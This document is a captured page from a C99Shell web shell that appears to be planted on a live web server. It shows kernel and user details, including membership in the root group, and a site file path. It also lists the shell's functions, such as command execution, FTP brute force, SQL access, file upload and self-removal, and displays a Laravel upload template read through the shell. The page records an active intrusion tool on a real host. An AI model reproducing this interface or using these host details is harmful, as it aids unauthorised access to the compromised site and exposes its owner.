!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/MediaManager/Resources/views/   drwxr-xr-x
Free 26.11 GB of 117.98 GB (22.14%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     create.blade.php (1.81 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('admin.layouts.app')
@section('page_title', __('Media-Manager'))
@section('css')
  <link rel="stylesheet" href="{{ asset('public/datta-able/plugins/fileupload/css/fileupload.min.css') }}">
@endsection
@section('content')
<div class="col-sm-12">
    <div class="card card-height">
        <div class="card-header">
            <h5><a href="{{ route('mediaManager.uploadedFiles') }}">{{ __('File Upload') }}</a></h5>
            <div class="form-group row">
                <label class="col-md-8 control-label"></label>
                <div class="col-md-8">
                  <span class="badge badge-danger">{{ __('Note') }}!</span> {{ __('Allowed File Extensions:') . $Files }}
                </div>
            </div>
            <div class="card-header-right d-inline-block {{ languageDirection() == 'ltr' ? 'me-1' : 'ms-1' }}" >
                <a href="{{ route('mediaManager.uploadedFiles') }}" class="btn btn-outline-primary custom-btn-small">
                <span> &nbsp;</span>{{ __('File List') }}
                </a>
            </div>
        </div>
        <div class="card-block file-upload-card-block">
            <form action="{{ route("mediaManager.store") }}" class="dropzone h-100 create-image-form">
                @csrf
                <div class="fallback">
                    <input name="file" type="file" multiple />
                </div>
            </form>
        </div>
    </div>
</div>
@endsection
@section('js')

<script src="{{ asset('public/datta-able/plugins/sweetalert/js/sweetalert.min.js') }}"></script>
<script type="text/javascript">
    'use strict';
    var maxFileSize = "{{ $maxFileSize }}";
    var acceptedFiles = "{{ $acceptedFiles }}";
  </script>
<script src="{{ asset('public/dist/plugins/dropzone/dropzone.min.js') }}"></script>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--